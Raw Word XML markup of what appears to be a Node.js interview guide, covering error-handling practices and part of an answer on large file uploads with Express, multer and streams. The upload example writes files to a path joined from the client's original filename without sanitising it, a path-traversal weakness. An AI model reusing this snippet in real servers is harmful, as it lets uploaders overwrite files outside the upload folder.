    <w:p w14:paraId="0EAC2A9B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centralize Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use centralized error-handling mechanisms like middleware in Express.js to keep your code clean and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB3B3F" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Error Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When throwing errors, use the Error object to provide meaningful messages and stack traces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CCFE8" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement graceful error handling where possible, such as retrying operations, logging errors for diagnostics, and sending user-friendly error messages to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0C009" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Silent Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always log errors or handle them in some way. Silent failures can make debugging difficult and lead to a poor user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064016B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Shutdowns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure your application handles uncaught exceptions and unhandled promise rejections, possibly by logging the error and shutting down gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412B1E1"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EBC1B"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console.error('Uncaught exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC360EE"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process.exit(1); // Exit the process after logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A4D8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582CD6F5"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B3F6792"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A751B76"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console.error('Unhandled rejection:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB6C63" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300"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lastRenderedPageBreak/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069E8BC" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1234D0" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handled with try...catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780D219" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handled with error-first callbacks, promises, or async/await with try...catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408EE50" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centralized Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use middleware in frameworks like Express.js to manage errors across your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB35BF" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always handle errors, centralize error handling, avoid silent failures, and ensure graceful shutdowns for a resilient Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0E486" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5E5627"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14" w:name="_Toc178383197"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q14. What is middleware in Express.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="571C067C"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15" w:name="_Toc178383198"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q15. How do you handle file uploads in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="37F8A81E" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling large file uploads, such as a 10GB file, in a Node.js application requires careful consideration to avoid running into memory issues, timeouts, and performance bottlenecks. Here’s how to efficiently handle large file uploads in Node.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956653B"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1. Use Streams for Uploading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62767C92" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js streams are a perfect fit for handling large file uploads because they allow you to process the file in chunks, avoiding the need to load the entire file into memory. This reduces memory usage and improves efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695DBB5"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Example using Express and multer with streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A9374" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECF3D7" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm install express multer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53612F" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create the Upload Route with Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B7EA3"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3C85D4DC"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multer = require('multer');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543C4C0"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43DFFFDF"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path = require('path');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0367ED40"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45055E8E"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7A09512A"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upload = multer({ dest: 'uploads/' }); // temporary storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BA175"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BEDE03D"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app.post('/upload', upload.single('file'), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC08317"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file = req.file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771D7CE"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targetPath = path.join(__dirname, 'uploads', file.originalname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570DA7F"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readStream = fs.createReadStream(file.path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757AF9BF"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writeStream = fs.createWriteStream(targetPath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC1CC3"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7678086E"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readStream.pipe(writeStream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E84883"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B32C0CC"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writeStream.on('finish', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B5204"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fs.unlinkSync(file.path); // remove the temporary file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54261953"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res.status(200).send('File uploaded successfully');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A675FE"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109803F"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489A4BD"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writeStream.on('error', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F81B4D0"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res.status(500).send('Error uploading file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E025459"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A6AAA6E"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9191E77"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3B2B9A2"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A88662E"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console.log('Server listening on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC49C86"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AB581CA" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50411CAA" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The file is read and written in chunks, avoiding memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF59061" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Temporary Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Multer stores the file temporarily in the uploads/ directory. The file is then streamed to its final destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0C549"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2. Use Chunked Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D58A9" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For very large files, it may be better to upload the file in smaller chunks, especially if there is a risk of network interruptions. This approach is common in cloud storage services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F2EBF"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01500C" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Client-Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79689D2B" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Split the file into smaller chunks (e.g., 10MB each).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D627F65" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Upload each chunk separately using a loop and an HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE1A70" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Track progress and ensure all chunks are uploaded.</w:t>
      </w:r>
    </w:p>
